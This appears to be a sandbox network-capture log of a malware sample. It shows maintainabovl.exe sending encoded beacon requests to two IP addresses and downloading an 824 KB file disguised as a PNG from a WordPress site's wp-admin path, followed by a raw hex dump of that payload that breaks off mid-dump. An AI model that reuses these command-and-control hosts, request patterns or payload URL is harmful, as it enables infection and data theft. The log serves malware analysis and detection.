Jan 12, 2023 12:14:38.185534954 CET | 926 | OUT | GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 31.41.44.158
  Connection: Keep-Alive
  Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49698 | 193.0.178.157 | 80 | C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Timestamp | kBytes transferred | Direction | Data
Jan 12, 2023 12:14:58.327919960 CET | 927 | OUT | GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 193.0.178.157
  Connection: Keep-Alive
  Cache-Control: no-cache


Session ID   Source IP     Source Port   Destination IP   Destination Port   Process
0            192.168.2.4   49695         174.142.60.54    443                C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp                 kBytes transferred   Direction   Data
2023-01-12 11:11:40 UTC   0                    OUT         GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1
                                                           Host: christianbeltran.co
                                                           Connection: Keep-Alive
2023-01-12 11:11:41 UTC   0                    IN          HTTP/1.1 200 OK
                                                           Connection: close
                                                           cache-control: public, max-age=604800
                                                           expires: Thu, 19 Jan 2023 11:11:41 GMT
                                                           content-type: image/png
                                                           last-modified: Thu, 12 Jan 2023 09:22:23 GMT
                                                           accept-ranges: bytes
                                                           content-length: 824832
                                                           date: Thu, 12 Jan 2023 11:11:41 GMT
                                                           server: LiteSpeed
                                                  Data Ascii: <\I_e5BQE:k{5Ig<4Hu%#J=^3D'6x'@)SZ*Ph^B,H&EcnGC%uww-%y++wV-/c_;e{;bz9\.'CAb}_iBU"cTrSn*C`d/b_C
                                                  2023-01-12 11:11:41 UTC496INData Raw: 03 07 de e9 83 cf 3e f0 b3 c0 94 e7 2e 81 94 b2 19 66 57 f8 c4 95 58 89 5a 74 db e2 e9 dc 2c 64 fb 06 be 0d a1 aa b4 11 4b 67 cc 74 f7 b3 e6 4e 2e 59 8c 45 28 90 e0 b2 5f 47 63 9e d1 55 00 e9 98 9b 75 38 24 9e c1 51 1b 92 f4 a3 b3 03 ce a7 41 ea 1e fb 88 52 4d f8 5a bd 0f 1c 2f ac 41 16 67 57 0f 1a 04 d0 25 ea b8 51 5c 6c 92 b7 1b 9d 44 81 b0 0f 6a 86 30 c7 30 fd 82 78 08 6b 84 81 92 4f 41 61 81 0c 62 d5 fd 3c 25 27 63 b1 2c 28 29 0c 54 52 22 82 7c 04 8c d4 c3 0f 23 e8 a1 b0 24 5e a1 54 c2 4a 54 45 76 00 90 6c 83 fe 72 83 d8 0c 90 d0 f7 c2 32 37 3b 94 5e e3 64 57 4d ee 69 6a 4c 27 31 3e 2d 18 df 17 61 d6 76 d1 83 48 b1 be 9f 8d 1f ae d9 94 62 20 44 47 ee 8a 4c e9 2e 0f 92 8e 60 cb c7 2d 9f ec 21 31 7b 21 4a 9a 04 ad f2 27 84 94 f4 59 a5 a6 7b 52 fe 5e 5f
                                                  Data Ascii: >.fWXZt,dKgtN.YE(_GcUu8$QARMZ/AgW%Q\lDj00xkOAab<%'c,()TR"|#$^TJTEvlr27;^dWMijL'1>-avHb DGL.`-!1{!J'Y{R^_
                                                  2023-01-12 11:11:41 UTC512INData Raw: b8 3e 59 91 79 07 73 ad a8 45 e9 fd 88 d5 e2 a0 eb 3a ea d7 59 3f 56 78 5b 83 3f f0 4e 25 73 ec 7a f2 90 df d5 d2 f8 d0 ba e8 23 2d 4d 2a 22 78 37 63 cd 35 30 22 eb 7f e7 19 f6 75 c3 ba 43 2a 53 71 55 b2 c3 c6 d4 8f b1 91 cb 26 89 92 ee 3c 10 d4 99 7d 69 f6 df d1 a6 cf c7 e1 60 60 a6 89 91 04 33 fc 7d b4 bd 96 b4 64 65 34 e5 dd 7e 0e c1 14 ec a1 bb fe 56 1a d2 1c 9b 0a 63 ca 62 b2 45 f1 25 95 06 f6 29 8e de 73 a0 03 d2 6a be 4e 77 69 ae da 43 f3 49 fa d7 a7 f1 38 77 7e 37 e6 c9 36 c9 b2 4f c1 79 3a a9 0c fb 33 fe ab 13 a0 7e 42 61 e6 91 f8 66 19 47 02 7c 51 04 fe 1e 3f f6 67 dd ed 40 e9 57 e1 8c c6 b1 71 53 18 1d 08 1b 5f 28 64 77 8f 4d df a6 c5 0d c4 06 06 0b 88 61 cf 3c 04 bc 03 96 0e ab 0c a7 97 0a 30 d4 97 d6 bc 70 9d 04 2d 6f e0 9a 6b d4 40 4d d5 1e
                                                  Data Ascii: >YysE:Y?Vx[?N%sz#-M*"x7c50"uC*SqU&<}i``3}de4~VcbE%)sjNwiCI8w~76Oy:3~BafG|Q?g@WqS_(dwMa<0p-ok@M
                                                  2023-01-12 11:11:41 UTC528INData Raw: 66 3d 87 3e 1b b3 03 25 c1 b9 bc 24 85 c2 6c 5b 4d 03 d4 64 76 e1 c8 47 79 a1 ff d0 a2 a1 aa 36 28 26 dd c7 60 5b b2 55 1e 16 f6 e5 ce d3 8d c1 40 86 67 1c 5b 34 70 ab 3d 1b 37 d1 f6 c2 2a ea b0 ce cd 84 24 5f e5 ac 14 59 9d 39 f9 a7 87 f6 d2 3f 29 80 bc 2f 65 35 44 df 97 e2 6c ae d4 eb 90 cf 5d 48 34 b4 01 44 22 b0 97 90 46 f0 51 20 d4 84 b1 b8 81 93 f4 72 33 ed 6d 80 80 0b 4a 7d ca 6b 67 9e cc 15 07 a2 0f d5 e9 ee e3 18 43 64 cd b5 a7 7a 8e 0b ad 44 6c a2 a8 77 75 b8 ac 4e fd 76 46 d9 df 15 26 f0 ba 61 0b 4d 11 85 ab 73 23 a6 97 f5 f9 e9 f6 cf 7e 72 dd f4 5e ab b1 86 a6 b3 85 e2 c2 d8 dd 0f 2c a3 65 ce 5e c7 34 c6 b2 57 05 06 67 b4 a8 3f 2d 14 13 d9 92 46 9c d2 08 6d 93 80 00 59 fa f4 6c 42 4a 1e 6f 99 94 b8 9c a6 36 01 07 ab e7 3d fc 2a f1 e2 35 53 1e
                                                  Data Ascii: f=>%$l[MdvGy6(&`[U@g[4p=7*$_Y9?)/e5Dl]H4D"FQ r3mJ}kgCdzDlwuNvF&aMs#~r^,e^4Wg?-FmYlBJo6=*5S
                                                  2023-01-12 11:11:41 UTC544INData Raw: d0 5e 86 9e 9a fa a3 62 ba a2 c7 da b0 ea 5a 6a 58 44 f0 76 df b8 96 81 4d 6c 76 c4 e9 33 85 af 2c 22 89 47 0d 80 29 db d5 f9 af 5a c9 68 e0 a4 26 67 2a bc c6 13 57 20 1f 8f 8b 56 ea 2c 90 33 e5 50 59 74 e2 40 91 ee 58 cd b6 25 c0 c7 18 7a c8 79 bb bc 50 14 af 07 ec e9 a9 59 4b 7e 2e 31 9f dc ff 52 c0 af 96 76 f1 3b d5 03 8f ca c7 2c 81 3f 70 e3 09 f5 29 4b b5 14 3b 34 b6 a5 ea 0e 0e 62 14 af 85 e4 de 8b 69 d4 d0 c5 dc 57 3a 06 50 c4 ef 46 ec dc 5f 24 28 86 0f e1 cd 38 5e 2a 30 fe 7c 0c 60 27 04 1f 2b c2 bf cd 46 cb 40 f7 aa 44 d5 e1 42 d3 02 6a 67 e8 a1 b0 58 0b 3f 05 4d 14 ed dc f9 14 78 72 0d 0a 39 39 9f 97 43 90 c0 c0 71 4f 87 91 21 78 b6 97 a4 9d 71 f8 c7 d7 29 71 fd 3c a8 b0 2e 32 08 b5 d2 c1 ad bc 44 1f cc 1c b3 6f 43 d3 9f a1 42 c7 d8 1c 0e 69 30
                                                  Data Ascii: ^bZjXDvMlv3,"G)Zh&g*W V,3PYt@X%zyPYK~.1Rv;,?p)K;4biW:PF_$(8^*0|`'+F@DBjgX?Mxr99CqO!xq)q<.2DoCBi0
                                                  2023-01-12 11:11:41 UTC560INData Raw: 02 00 97 6e 7f 82 2e 19 0b 76 fb 65 03 e5 89 f6 6a 0a 60 fc 24 8a 48 82 11 a5 59 70 b6 e7 c9 fa a2 ae 45 6f c1 b1 1e 89 a1 03 be f0 b2 16 8b e6 bc 52 48 d9 73 bd 1b 4c 19 1f c6 f7 cc 76 22 92 66 34 d0 dd 71 43 7c 92 48 32 09 48 ce 10 57 ee 88 a5 9f 94 6f 50 8c e4 a9 20 03 fd d8 0e 95 b0 50 6c ff dd 6c 1b a5 61 97 60 d6 a4 30 9a 0c 94 0a 67 39 d6 1b 73 93 d6 2b 47 0e d3 9e 38 43 5a 58 c2 0c b3 bf 36 eb 80 a4 17 2d e0 4d c2 f2 96 f6 81 07 82 5a 48 cc 9f fe e8 1a f6 98 cc 13 b5 97 e7 4f a2 43 c1 63 25 b3 c3 15 0a ee 9b 2e 5e 22 50 93 6a 17 b1 c8 7d 8b 8c a4 7c 45 05 13 71 05 95 5e 40 56 8c 29 6e f1 4a fb 73 d4 9f 1c fc d8 41 32 ba a3 ea cf bd 82 22 d2 a1 d5 2d 08 d5 c5 3e 49 8e c6 8d 2d 18 3c 13 25 70 0f f4 f4 b5 c5 83 a0 59 79 c2 76 a9 81 2e 2f 8f 2c 00 18
                                                  Data Ascii: n.vej`$HYpEoRHsLv"f4qC|H2HWoP Plla`0g9s+G8CZX6-MZHOCc%.^"Pj}|Eq^@V)nJsA2"->I-<%pYyv./,
                                                  2023-01-12 11:11:41 UTC576INData Raw: 9e 96 97 fe c1 da 42 bb 65 10 24 2e f3 93 d7 20 d0 6f 4f 33 cf 30 d7 89 1c 63 56 55 ed 2a db f3 b5 63 14 0a 22 86 35 a8 7b a2 d5 5b 91 cd 67 f2 38 99 f2 4b 3b 5e fb 13 44 30 57 fc 72 3d 50 f6 d2 f8 bb f0 aa fa 98 91 c7 6b 31 ea 09 41 e6 e4 3f 2c 62 89 49 d1 c5 5d 4e d8 38 77 51 d7 f7 44 a6 28 25 5c b5 dd 79 ad 27 0f b0 34 2b f8 69 95 c7 94 36 44 7b 70 c5 25 d2 9c 6e 41 4d ea 02 e5 e6 e1 eb 77 89 5f 88 fa 8f 8c d4 74 4c 43 e0 8d 1b 61 4f 6e a7 f1 b7 db 83 aa 61 fd 7b 63 2c e6 57 b0 25 6a 4f 11 4f a6 e6 b8 d3 de bd 51 3a 6d 2d dc d7 b6 8e 89 12 f1 c2 8c a6 b7 36 3b c8 48 58 db b7 fc 02 34 e1 67 5a 77 48 e5 26 03 1f 88 fa 24 f3 c7 a3 f8 ab ad 62 c6 81 d7 04 f4 91 34 5c 4f 0b 19 f7 b2 03 68 d3 e2 a5 fe fd 55 88 71 40 65 07 a8 f1 37 81 50 e4 18 70 5a 9b 98 b3
                                                  Data Ascii: Be$. oO30cVU*c"5{[g8K;^D0Wr=Pk1A?,bI]N8wQD(%\y'4+i6D{p%nAMw_tLCaOna{c,W%jOOQ:m-6;HX4gZwH&$b4\OhUq@e7PpZ
                                                  2023-01-12 11:11:41 UTC592INData Raw: 1f cf 30 34 a5 b7 e9 ac c0 b9 c4 fa 1e e6 41 2a 86 62 ae 1d dc ff 34 87 fa 35 1e 30 30 5e a9 77 dc 86 b9 18 60 02 84 68 a5 d4 eb f0 3a 71 8c 1f 24 d8 b9 6b b3 28 15 ea 11 e5 9e 77 83 ab 26 df 95 6a 03 78 0e 85 75 4e 5c c0 d6 6e e5 1e f2 29 62 0b a7 11 11 1f ec 5f 2b 67 6c b2 d3 1e 3c 9f 40 45 c6 77 53 c9 aa 01 65 59 2b 6d dc 24 7a c4 a8 77 aa f6 45 2c cf 17 71 6f 32 98 d0 d6 e2 81 8a ec 23 c9 18 41 82 83 18 57 64 60 91 a0 1d 97 f4 aa da 12 21 d9 08 c6 a3 40 aa 93 d3 1b 89 fb fd 18 5e 56 48 2e 6a 9e f4 2d d3 8b 3a 3c 1c 52 8b 82 da 44 5a 47 04 6f 02 5e c8 17 8c a4 f8 19 5a e6 47 8b 5b 84 86 d3 67 8c d6 9a 11 d1 f6 6d d6 a3 a6 74 42 c7 00 38 aa 8a 8c 85 4d 88 32 d1 67 24 31 fb 36 56 f4 c5 2d 19 b6 6a 8f 5f 7a fc 81 b5 c0 65 61 70 84 6f b8 77 f7 9c 00 77 52
                                                  Data Ascii: 04A*b4500^w`h:q$k(w&jxuN\n)b_+gl<@EwSeY+m$zwE,qo2#AWd`!@^VH.j-:<RDZGo^ZG[gmtB8M2g$16V-j_zeapowwR
                                                  2023-01-12 11:11:41 UTC608INData Raw: 75 9d dd 21 60 ab 14 2b b8 85 20 fd 30 5e 85 d5 6b ce 73 f9 82 19 46 94 dd 2f 4a 74 be 64 2b 15 08 b6 77 b0 c5 6e ab 90 d4 6d 07 25 1d 60 f0 6a 6f c2 1b d8 2f 66 59 e3 48 82 a0 7a 5a a0 3e 72 7f c3 6a 97 23 24 72 58 41 2d 3d 68 59 e7 9b bc 02 b1 c3 0c e3 9a 22 ef 15 9e 88 04 f2 c0 ea 57 e9 80 51 03 85 58 29 50 28 4f d5 24 07 8f 6a 37 a7 c4 4d b6 77 f5 31 e2 39 3a 27 16 6f ab 7e 9b 1b 35 42 9c 43 f1 5d 0f 82 0b 5e b1 ec 04 2c 87 f8 98 5c 34 f1 f6 d6 42 e4 6b e5 b5 c5 88 4c bf c9 3b 27 81 d9 b5 18 8a 93 ff 4d fa d9 3c a5 ab 0f 6b b4 d4 e0 d5 95 4d ee 06 b6 83 cb a9 25 2c ed 9c 84 69 ae f7 73 d4 90 f8 f2 2b 15 29 5c e6 ff ff b8 3a 6d c4 7b 4f b9 09 b4 99 3f 6f b5 fc c5 2c c1 db f6 38 c4 51 16 19 d1 35 fd f9 c2 65 33 38 fd 25 e9 47 a7 d7 65 e3 08 10 7e 8c db
                                                  Data Ascii: u!`+ 0^ksF/Jtd+wnm%`jo/fYHzZ>rj#$rXA-=hY"WQX)P(O$j7Mw19:'o~5BC]^,\4BkL;'M<kM%,is+)\:m{O?o,8Q5e38%Ge~
                                                  2023-01-12 11:11:41 UTC624INData Raw: 7f 9e e3 e9 34 db eb cd 76 40 0a 19 b7 fe f9 2b 68 a4 4d 9a a3 ea ad fc 55 72 10 51 ef 6f 0c f7 33 83 9e 56 28 3c 7a bb 42 35 99 d9 aa 9d cd e4 04 5f b5 01 95 40 48 98 5f 8d c0 4d 89 76 ba 41 d0 86 94 b2 e0 76 fe 42 d0 15 8d 8c f7 f8 54 d4 ee a7 75 dc b4 8d e6 2b 39 de 9d e5 eb 94 50 f9 24 e1 e6 ed e8 c0 64 bf 49 52 9b 7a 7b 1b 64 31 33 ab 72 58 77 98 49 fd 23 55 e3 8b 6f 98 9a 11 b4 58 12 99 45 9f 9f 91 9e 33 61 62 52 79 84 06 d5 9b 06 36 68 33 6a 71 72 9b e0 14 36 72 0c 60 c4 f0 25 ee e8 1f 7c 0d f1 b1 bb b1 0c f0 a0 0a 19 3c db ed 2a 03 1f 07 73 10 b2 3c 51 33 fd 06 6c f1 17 a4 d1 b8 d1 87 13 b5 e4 55 86 96 b5 ce 42 ef 96 dd c4 de a0 9f 10 5e 32 ca bb 2e 5c 6c 65 69 1b 5a f6 e9 4b 89 11 e2 e5 c3 af 37 13 c5 73 d8 85 5d 6c f2 20 fb 9c 57 4d a6 80 64 e5
                                                  Data Ascii: 4v@+hMUrQo3V(<zB5_@H_MvAvBTu+9P$dIRz{d13rXwI#UoXE3abRy6h3jqr6r`%|<*s<Q3lUB^2.\leiZK7s]l WMd
                                                  2023-01-12 11:11:41 UTC640INData Raw: a5 7d 4d f0 3a 54 ae c2 e3 c2 8b 95 2d 7f fb c4 18 0d 40 1b e5 3e 7a a1 cb e7 64 a3 ba ee 89 23 65 86 19 f9 be f6 cf be 41 b2 6b 3e ad f2 e3 04 31 aa 14 bf 39 20 22 70 8e 0f c3 e6 5a 1a 1d e5 f0 7c aa 1c da ca 30 cc c4 3a 9a 27 81 a9 54 ca 17 e8 98 61 a8 1c cb e6 e8 e0 cb 24 2b 6c a5 b4 da d1 c2 16 4d 21 58 91 4c 62 aa bf ad e6 34 2a 2b 5a ae b2 25 b7 81 e8 bd 00 84 25 2f c6 fa 54 35 da fe b9 76 49 72 92 ec e9 db b2 c6 b8 d1 f4 72 8d 40 36 91 ab 5a 20 3e c8 fd 8c ef da 5c 20 74 5d 1f 1c 69 5c b2 fb 92 d9 67 5e 37 a7 32 b2 eb 75 4a 39 db 63 ea d2 c5 34 e0 b7 ec f1 ae d1 ae bf cd 65 34 2f fc 43 66 d1 b6 d9 4a b0 c4 24 ad e9 ca 4e 3a aa 33 e3 4f f1 ad fd 3a 14 1c 83 f1 02 f3 9c fb eb b0 cf 3a 58 0b ec 7b 9a 30 4d ca d6 00 21 6d 46 d5 8b 10 3e 02 df 12 37 d1
                                                  Data Ascii: }M:T-@>zd#eAk>19 "pZ|0:'Ta$+lM!XLb4*+Z%%/T5vIrr@6Z >\ t]i\g^72uJ9c4e4/CfJ$N:3O::X{0M!mF>7
                                                  2023-01-12 11:11:41 UTC656INData Raw: 1b 58 31 06 d0 6f 3e 88 1b ec df f7 fc 5c 4d 69 b1 7c 00 08 9c 2b 2a da de 96 89 ac d9 e2 09 4b 6b 5b ba 2f 02 dc 8a 11 de ae 36 1f 68 a6 12 77 7b 8b 86 47 b5 13 2f 41 b8 55 94 67 bf b7 3a 2d a6 7f 4b 81 85 c6 e0 7d 17 bf 0f 85 e8 67 28 c5 c9 90 74 89 43 b3 ca a2 a0 c0 13 27 60 43 0b 5c 9c 4a 6a 02 ae c5 02 76 c0 31 6d 8b d6 de 64 9b d5 01 43 8b 6a 27 1a e1 17 bc 3e c5 61 91 21 48 1c 74 b0 41 bd 37 e0 b3 e9 99 ee 59 bc f3 25 10 9a 88 67 5d 6d d8 ac 6a 12 f0 c0 28 4b f7 9d 95 62 ed 70 fc 59 84 fa 20 ea 69 d0 a7 7a a6 62 f3 6f f0 7c b1 ce fb c6 f9 97 d2 ae ad 42 cb 4c b0 29 a2 c2 38 50 bf 99 55 c9 2e c4 17 f3 ae 02 58 32 a8 ee b1 c5 a4 9b d2 b6 f8 4e 9e a7 6e a6 1b 73 1a 59 03 77 cc b6 45 11 14 be f1 e7 54 da 55 29 93 d9 a4 97 4a a6 6b e4 bf a1 8d 5e 41 5b
                                                  Data Ascii: X1o>\Mi|+*Kk[/6hw{G/AUg:-K}g(tC'`C\Jjv1mdCj'>a!HtA7Y%g]mj(KbpY izbo|BL)8PU.X2NnsYwETU)Jk^A[
                                                  2023-01-12 11:11:41 UTC672INData Raw: 88 79 75 50 49 d0 67 b4 e2 11 92 40 1d 20 af 9e 73 e3 dc ca 1d 9f b1 62 e7 a1 7a 48 62 88 13 99 d4 cc 22 40 09 d3 38 e1 47 c9 1a 5c 00 9c ee cc 0c 45 02 f6 d5 be b0 cd 76 a8 8a 77 b5 58 b7 f9 3b 89 b8 cd 7c 01 ef ea 72 c4 d5 c7 ef 39 d0 51 f7 e4 72 6b af 74 32 ad c9 76 31 ae 39 36 b8 8f 7a b0 01 82 70 28 da 3e 0b b3 5b 68 55 39 8f 76 31 50 7a f8 4a a8 27 94 18 fb 96 63 d2 fb 0a cd d2 de f0 77 f9 ea 7a 12 63 9b 10 2a 32 5c 93 ae ee 3c 33 61 2a 89 23 04 99 eb 74 22 15 91 46 88 15 fd 94 55 a1 bc b1 92 16 5c 4b 33 77 15 96 93 e0 00 bf 95 7c 65 3c 20 6a 59 9f 3d 5d ba 53 64 9c 72 34 e8 20 f6 4b e1 9b f9 68 80 11 b3 8a 2d b2 73 81 88 a1 fb dc 3a 89 6b 4b 86 df 41 5b 92 95 6a 5f d6 9a 73 0f d4 0d 6e f7 5a 4d 3f 50 cf e4 82 4a 5e 3d b0 66 d3 70 40 65 bb 9e 66 32
                                                  Data Ascii: yuPIg@ sbzHb"@8G\EvwX;|r9Qrkt2v196zp(>[hU9v1PzJ'cwzc*2\<3a*#t"FU\K3w|e< jY=]Sdr4 Kh-s:kKA[j_snZM?PJ^=fp@ef2
                                                  2023-01-12 11:11:41 UTC688INData Raw: 81 41 30 45 fd 7f fb 8b dc 49 f5 ad d7 1d 9e 69 65 c3 a0 62 b3 71 f0 6b b6 59 ff 94 98 59 39 92 1b 0c de 3f e4 c1 eb 90 c0 4d d8 ea 84 b2 50 99 21 53 b0 85 fa a8 c0 49 f2 a2 74 b2 9b db 90 94 eb 42 2a d1 51 90 01 3a 6d 4f 3e b7 be 0e c6 ee de 16 5f cf 57 35 9d 05 fe ba f1 bb de 3b aa e9 46 f9 fb 4f 39 3b 1a 7a a3 a9 cf 77 42 ed a3 2c c6 db 7d 7f 0b ff ca 4d d2 83 b6 14 be cb 19 44 96 03 c4 11 ac 19 27 c8 20 3e 16 81 61 d1 cc cf 48 60 27 ef 2b ba a8 6a 61 83 5d de 91 68 ed 9b 98 ee 1a 02 93 4b 94 08 2d 4b 5e ae 2e 52 11 c1 8f aa 89 24 ed 30 6c 9d 20 12 09 7a c6 5b a9 db 45 5c 01 5a 59 79 f1 9b 5c 54 06 99 12 f9 ac 26 56 99 99 3c 01 cc d6 93 ac af 55 f3 b5 6e ce 2e 19 77 5f c4 ff ad 58 40 7e 4e 4f 7d fd 76 d0 87 e5 6d f8 b6 5e e8 7c 43 36 af 62 ab df 1e 53
                                                  Data Ascii: A0EIiebqkYY9?MP!SItB*Q:mO>_W5;FO9;zwB,}MD' >aH`'+ja]hK-K^.R$0l z[E\ZYy\T&V<Un.w_X@~NO}vm^|C6bS
                                                  2023-01-12 11:11:41 UTC704INData Raw: e5 12 93 73 c9 38 10 00 20 4a 7b 6b da 16 56 29 03 fa d0 00 f3 31 3e 50 ab 97 53 c2 4c 81 48 60 2e 39 a9 b1 69 44 9f c9 23 5c 0d d7 c7 6c 60 95 57 22 03 e1 fa 32 ea 69 86 66 ef 3f 07 89 bd 61 d1 45 cf 42 ad 30 0f 5d 4f 98 43 b5 d4 b8 95 f3 9f b6 37 bb 88 66 b8 fc b0 a8 94 d5 db a9 6c aa f8 da 0b 54 12 42 12 26 fa f0 ac 31 5a 74 10 60 7c 25 99 50 b6 88 5c be e4 e5 2c 5d 30 bf a8 60 bb 7c 8c 84 a7 8d 26 25 fa 8c 23 70 1f 01 da f2 ee 66 1e 5b ba 3e ce 8d 35 a1 81 52 d7 34 00 14 a0 de 39 98 bf 92 47 56 0a 2a fb cb 75 67 e3 60 5d 31 66 96 49 cc 0d 9a 8d 04 6a 54 b2 c4 bb 14 1b 2c a5 f1 cf 58 93 be 8b d7 13 13 85 f7 68 e5 42 fe 49 49 c1 8e 06 19 26 ad a8 3b 90 98 92 8b c0 a1 85 92 84 72 33 9b 5e 79 fe 66 65 32 10 3e 5f 36 a6 e5 47 05 da f8 3a 9b 15 3a 88 83 9c
                                                  Data Ascii: s8 J{kV)1>PSLH`.9iD#\l`W"2if?aEB0]OC7flTB&1Zt`|%P\,]0`|&%#pf[>5R49GV*ug`]1fIjT,XhBII&;r3^yfe2>_6G::
                                                  2023-01-12 11:11:41 UTC720INData Raw: d9 6a d9 d4 e3 13 19 f0 0d c0 ed 72 dd fe 5b 3f 14 8f 89 f3 22 2d 1a 28 3f 92 d9 2c a7 28 6c ab 55 b2 51 76 fc 58 ef d9 ef 8c d3 78 fe 28 1e d1 e6 61 30 a9 e2 29 58 c7 7b 38 ce 4e 0b c1 26 a1 d7 0b bf 1f ff 06 84 64 fa 92 6a af 1d b8 ab 0e d0 95 3f 1a 41 5c c5 d3 7c cd 47 09 fd f5 d8 c0 5d 25 4a 0d 23 90 2e f8 b1 fe b4 ff 06 e4 5c 5e 3d 6d 50 31 b5 1e 90 e3 02 2b 27 9e d3 4f 5e d8 2f ab dd 9e 24 a6 61 82 15 52 dc e1 70 49 d3 78 f4 96 7f e1 15 1f 93 b7 7a 7a 02 96 cb a6 ed 32 9c 3a e2 f5 b2 5a 8b de cd 61 f6 a1 12 b2 67 5d bf 2d 63 b0 ed 15 8e 3b e3 7a b0 49 cd ef 6a 0c b9 1c 01 0b d3 47 55 42 13 6c af 8f 5c 2d d3 ba 52 cf 1e 3e 8a fb 64 04 52 66 d6 fa 21 03 b0 70 7f a3 e4 a1 37 16 83 91 7e 14 c8 28 e0 68 27 fe 7c 8f 6a 0a 77 d2 ad 24 1b d9 49 2c 7a 1d cc
                                                  Data Ascii: jr[?"-(?,(lUQvXx(a0)X{8N&dj?A\|G]%J#.\^=mP1+'O^/$aRpIxzz2:Zag]-c;zIjGUBl\-R>dRf!p7~(h'|jw$I,z
                                                  2023-01-12 11:11:41 UTC736INData Raw: 89 f7 72 e7 06 80 b8 eb 3e ee 02 a8 d1 e4 e9 02 bb 79 13 8b b2 b6 db 3a 75 ec 8f e2 73 d4 f2 dc 18 33 d5 d3 9e d9 86 a8 e9 ef ba df 52 04 4e 81 8d 9e b1 03 ec 76 38 75 bc 3f cb a7 1e a5 02 17 fb 83 95 5a f0 6c d8 9f 09 26 17 e4 9a 49 f3 e1 57 4f 9a 4a f7 f1 f2 32 ad ed 69 0d b9 68 e0 83 95 a3 18 5b 3e 50 b6 5c b6 87 c3 2b 5e 37 38 4d b8 80 c7 4b 44 61 02 f4 b3 86 17 55 52 06 a4 58 5d 58 98 bf 23 36 f0 70 fb 19 dc ec 52 0f 8a 2e e3 e6 72 da f0 e7 3a d3 8d 20 e2 27 56 cf 81 98 9f 24 57 99 de 88 d7 38 43 72 47 18 a4 3d 7d 77 1a 0c 7a 6d 18 5a 32 33 3f 32 20 5c 3b fc a8 d9 bc 5f b3 cd ed e4 66 c0 b7 7a eb 42 c4 dd e3 0c 1c cd 66 71 8b c5 29 c5 8b 80 d8 07 bf 18 77 ea c7 0c 1c be 57 97 62 1b e9 43 bf 9a 2d a7 39 70 7a b6 f9 fe 25 fe 0d c5 05 f9 6e 10 5e 87 07
                                                  Data Ascii: r>y:us3RNv8u?Zl&IWOJ2ih[>P\+^78MKDaURX]X#6pR.r: 'V$W8CrG=}wzmZ23?2 \;_fzBfq)wWbC-9pz%n^
                                                  2023-01-12 11:11:41 UTC752INData Raw: ee 7a 4d 72 18 81 9b 3f 3a 6e d2 5e 5e c5 6a 5c 12 60 a2 06 b1 ff 6b ec fc 11 cf c5 6e 62 64 00 d1 da 49 a3 1c 46 36 a6 9a 72 ae 06 e7 06 99 28 36 87 cf ac ad b1 af 92 43 16 77 16 ef 76 27 87 16 a9 55 8d 1b 02 0c 18 9d 79 d2 e1 d4 f2 2a b5 4a fc 0e 80 64 d1 35 06 af e4 2f 9b a4 41 f3 e4 b5 d3 61 5c ae 44 99 4a 89 7c 28 17 f7 f2 2a 9f 7e 6a a0 5b c3 0a 72 fa 49 2e b5 55 d9 a5 52 f5 29 5b 23 d0 eb 8c 06 ce fb db 63 78 9b 15 d3 71 af ce ee dc 4a 54 bc 13 88 fc b3 ba 95 cc 9b 66 af 9c 3e a8 e1 4d 83 fa 94 6b 38 d5 d0 5f 56 6d 1f 4f fc 70 c6 19 d2 bd c1 74 45 65 50 91 fe b1 6b a0 78 a5 e5 23 c0 72 dd c6 68 05 de 5e 91 1a 17 1f 78 a2 ff f7 ba aa 87 bc a1 38 1c f9 f1 ee 85 12 d0 37 86 56 11 6f 04 8a ab f4 fc 8a b1 a9 16 6d d8 7d e3 27 96 c3 32 07 2f d8 40 9b 81
                                                  Data Ascii: zMr?:n^^j\`knbdIF6r(6Cwv'Uy*Jd5/Aa\DJ|(*~j[rI.UR)[#cxqJTf>Mk8_VmOptEePkx#rh^x87Vom}'2/@
                                                  2023-01-12 11:11:41 UTC768INData Raw: 93 e9 5c bd af f1 da 7f 7b 26 37 c8 dd c1 db a7 99 47 32 98 a4 eb 56 b9 39 03 df 6c 27 fc 53 05 d3 5e 3f 2f 52 6c a0 ac a6 99 1a 08 af 48 07 3c 81 c6 af 98 e2 bf c7 14 f7 1b 5d 55 c7 23 d6 86 7c 47 02 98 54 1f 7f 89 ce 47 d4 64 03 13 a8 3a b4 9f ec 49 dd 26 2d 68 b9 63 60 e3 62 3f 2d bc 07 b1 9d 24 68 99 a4 5e ac 78 dc ff 97 09 90 b4 6a d5 c4 36 da 53 29 76 21 99 5e 8c 48 d5 37 29 e8 19 4d 56 31 bc 96 b5 21 95 d1 6c e4 f6 a8 ba ea c8 22 88 e8 bf bf 2f 1d 14 bc 42 a1 02 dd 9c 5b ae ca 6d 5e 8b 2d 85 7f c2 be 96 ec 7d c9 8c 37 d6 bd 89 19 7b a9 79 a2 5c 81 38 14 29 f8 00 cd 98 bd 62 e9 02 95 e1 75 bf 7f 1a 9b 87 58 43 a9 0c f8 b6 a9 bd 95 31 f2 64 29 66 bc b6 